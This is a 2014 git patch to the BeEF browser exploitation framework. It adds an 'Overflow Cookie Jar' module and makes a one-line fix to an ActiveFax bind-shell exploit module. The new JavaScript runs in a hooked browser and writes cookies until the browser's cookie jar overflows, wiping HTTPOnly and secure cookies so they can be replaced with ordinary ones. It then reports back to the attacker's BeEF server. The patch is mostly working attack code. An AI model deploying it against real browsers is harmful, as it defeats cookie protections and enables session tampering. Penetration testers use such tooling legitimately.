From 0e57fb0be1f0f6d91438316490203c3f613b8d94 Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Sun, 19 Jan 2014 19:58:14 +0100
Subject: [PATCH] Inital version of CookieJar overflow module.  And minor
 bugfix of active fax overflow module.

---
 .../overflow_cookiejar/command.js             | 79 +++++++++++++++++++
 .../overflow_cookiejar/config.yaml            | 15 ++++
 .../overflow_cookiejar/module.rb              | 16 ++++
 .../active_fax_beef_bind/command.js           |  2 +-
 4 files changed, 111 insertions(+), 1 deletion(-)
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/command.js
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/config.yaml
 create mode 100644 modules/browser/hooked_domain/overflow_cookiejar/module.rb

diff --git a/modules/browser/hooked_domain/overflow_cookiejar/command.js b/modules/browser/hooked_domain/overflow_cookiejar/command.js
new file mode 100644
index 000000000..8671568b1
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/command.js
@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+   var preserveCookies = '<%= @preserveCookies %>'
+
+   var initialtimestamp;
+   var currenttimestamp;
+   var i = 0;
+   var preservedCookies;
+	
+   function setCookie(cname,cvalue){
+      document.cookie = cname + "=" + cvalue;
+   }
+
+   function getCookie(cname){
+      var name = cname + "=";
+      var ca = document.cookie.split(';');
+		
+      for(var i=0; i<ca.length; i++){
+         var c = ca[i].trim();
+         if (c.indexOf(name)==0) return c.substring(name.length,c.length);
+      }
+      return "";
+   }
+ 
+   function deleteAllCookies(){
+      var cookies = document.cookie.split(";");
+
+      if (cookies.length > 0){
+         var cookie = cookies[0];
+         var eqPos = cookie.indexOf("=");
+         var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
+
+         document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
+         if (cookies.length > 1){
+            //Timeout needed because otherwise cookie write loop freezes render thread
+            setTimeout(deleteAllCookies,1);
+         }
+         else{
+            if (preserveCookies){
+               var pc = preservedCookies.split(';');
+
+               for(var i=0; i<pc.length; i++){
+                  var c = pc[i].trim();
+                  document.cookie = c;
+               }
+            }
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'Attempt to overflow the Cookie Jar completed');
+         }
+      }
+   }
+
+   function overflowCookie() {
+      if(getCookie(initialtimestamp) === "BeEF") {
+         currenttimestamp = Date.now();
+         setCookie(currenttimestamp,"BeEF");
+         //Timeout needed because otherwise cookie write loop freezes render thread
+         setTimeout(overflowCookie, 1);
+      }
+      else{
+         deleteAllCookies();
+      }
+   }
+
+   function overflowCookieJar(){
+      preservedCookies = document.cookie;
+      initialtimestamp = Date.now();
+      setCookie(initialtimestamp,"BeEF");
+      overflowCookie();
+   }
+
+   overflowCookieJar();
+ 
+});
+
diff --git a/modules/browser/hooked_domain/overflow_cookiejar/config.yaml b/modules/browser/hooked_domain/overflow_cookiejar/config.yaml
new file mode 100644
index 000000000..7c0f7090d
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        overflow_cookiejar:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Overflow Cookie Jar"
+            description: "This module attempts to perform John Wilander's CookieJar overflow.  He demonstrated this in his <a href='https://www.owasp.org/index.php/OWASP_1-Liner'>Owasp 1-liner project</a>.  With this module, cookies that have the HTTPOnly-flag and/or HTTPS-flag can be wiped.  You can try to recreate these cookies afterwards as normal cookies."
+            authors: ["Bart Leppens"]
+            target:
+                working: ["S","C","FF","IE"]
diff --git a/modules/browser/hooked_domain/overflow_cookiejar/module.rb b/modules/browser/hooked_domain/overflow_cookiejar/module.rb
new file mode 100644
index 000000000..f3dd0478d
--- /dev/null
+++ b/modules/browser/hooked_domain/overflow_cookiejar/module.rb
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Overflow_cookiejar < BeEF::Core::Command
+  def self.options
+     return [
+	{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
+      ]
+  end
+  def post_execute
+     save({'result' => @datastore['result']})
+  end
+
+end
diff --git a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
index a3ee88079..c06221343 100644
--- a/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
+++ b/modules/exploits/beefbind/beef_bind_exploits/active_fax_beef_bind/command.js
@@ -35,7 +35,7 @@ sendpayload = function(payload, uri, timeout, logdata){
         this.send(ui8Data);
       };
     }
-    xhr.open("POST", url, true);
+    xhr.open("POST", uri, true);
     xhr.setRequestHeader("Content-Type", "text/plain");
     xhr.setRequestHeader('Accept','*/*');
     xhr.setRequestHeader("Accept-Language", "en");